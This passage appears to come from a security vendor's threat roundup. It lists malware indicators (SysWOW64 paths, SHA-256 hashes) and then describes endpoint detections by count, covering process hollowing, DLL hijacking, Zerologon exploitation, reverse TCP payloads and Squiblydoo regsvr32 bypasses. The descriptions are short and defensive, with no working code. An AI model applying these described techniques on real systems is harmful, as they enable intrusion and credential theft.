%SystemRoot%\SysWOW64\gqsnjbaw
13
%SystemRoot%\SysWOW64\rbdyumlh
13
%SystemRoot%\SysWOW64\hrtokcbx
13
%SystemRoot%\SysWOW64\isupldcy
12
%SystemRoot%\SysWOW64\oyavrjie
12
%SystemRoot%\SysWOW64\akmhdvuq
11
%SystemRoot%\SysWOW64\tdfawonj
10
%SystemRoot%\SysWOW64\qacxtlkg
10
%SystemRoot%\SysWOW64\uegbxpok
10
*See JSON for more IOCs
File Hashes 00f242bc44c5248cc25b0d8acee2b061346cc4a5324e5054aa2b55142b0dbee6
011658ddb0669763ac08644873449d34c3f33d2002a0f844792005db0ce5609b
019bf0680df79bffa823f1a3918ea67d7ad10f0cbcc40e1a88d874d02b8d2dc2
02299de4f5af9a9cbad028b4d5764f0371c12109845e57e32c46595366efe539
0495248ec28f2554c2714cca9555f31740bf67e7fc97b3cc5ac1cbd9efe72cb7
04f06f660267078a5a2c7048f404c2bd599de312f6311ae10a76f2020c6badec
0525137a6739f44efd5cac8c4d26ba402f4473f3d1413925ceb0b9e75b0b2b84
060a5186b5b2adc8371b4ce0cebb0e14c5b4e913d7d9e08c6af102c974bc0592
069e7337c8444f925494eb65ffb787b3cc019e5c09611df002a87d2c10e65ce4
06e06de3bf171d6b15a7383d1618df129cf373abd7347214ce44d955eb664e2d
074e7d77e002d485117749e96ea50593d1de3d92d88d55039d0268d8bc41badd
082c3649e8e3c4ff25d5cdad50baafd3520bfd75f06e2ef9a3cbcee3525c490d
089b06dbe61e07ab888375ea270e089f43721ef3a3fc3afb4c35bf8032824195
09073ace4e3cafdeb33a1ea6d792e6e759a2652f2eb71a17116a9850726638ed
09b4d0f1a784921aec9998689e809224f4f188672f232f02b4648aa70cd9fca6
09b8746d2fccfb3b2bfea13590abfd0bc199078465d04b18ff4d0cd3b119c5a4
0beb0fb7155500ac10b732b1ceea7d825cbdf4d786f9abf4949375b358d6f875
0cb5517715dfdf737e64fd70e2cd3ba381cb13cde4884d4b3fdd49917ede6366
0e8d0355f7931e398be43ac49540458001b634beb51f02b37757bf51ee65da57
0f00a2e458640c2a271ae4f6ab1a770ba961de752b51ba6819319a380ac5fc91
0f06cbb5221543def460036b32c7f51e02be78f0bd24203811c2a7e1c5780b02
0f1af419562afec3780872de1d127835022e124da0d0fa465c390703a32478a5
1013f8e04f61bec2cd8c7780e66ddf724cde0124371b78e3c222065a8690dcf0
11506f818ef7327b7c10bf71698bc6315110b06f822788be2f505a4242b475c0
116fb95465708fbc2a897e20181ae61543c8a07df08431940c22605e2752569d*See JSON for more IOCs
Coverage Product Protection Secure Endpoint
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Secure Malware Analytics
Umbrella
WSA
Screenshots of Detection Secure Endpoint
Secure Malware Analytics
MITRE ATT&CK Exploit Prevention Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
Process hollowing detected - (32784)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Crystalbit-Apple DLL double hijack detected - (6323)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Expiro Malware detected - (6068)
Expiro malware is unique in that it infiltrates executable files on both 32- and 64-bit Windows systems by appending its viral code to the host. It can be used to install malicious browser extensions, lower browser security settings, and steal account credentials.
Excessively long PowerShell command detected - (4283)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
A Microsoft Office process has started a windows utility. - (2642)
A process associated with Microsoft Office, such as EXCEL.exe, OUTLOOK.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
CVE-2020-1472 exploit detected - (2308)
An attempt to exploit CVE-2020-1472 has been detected. Also known as "Zerologon". This is a privelege escalation vulnerability in Netlogon.
Reverse tcp payload detected - (1743)
An exploit payload intended to connect back to an attacker controlled host using tcp has been detected.
Dealply adware detected - (1352)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Kovter injection detected - (653)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application control bypass attempt detected. - (517)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
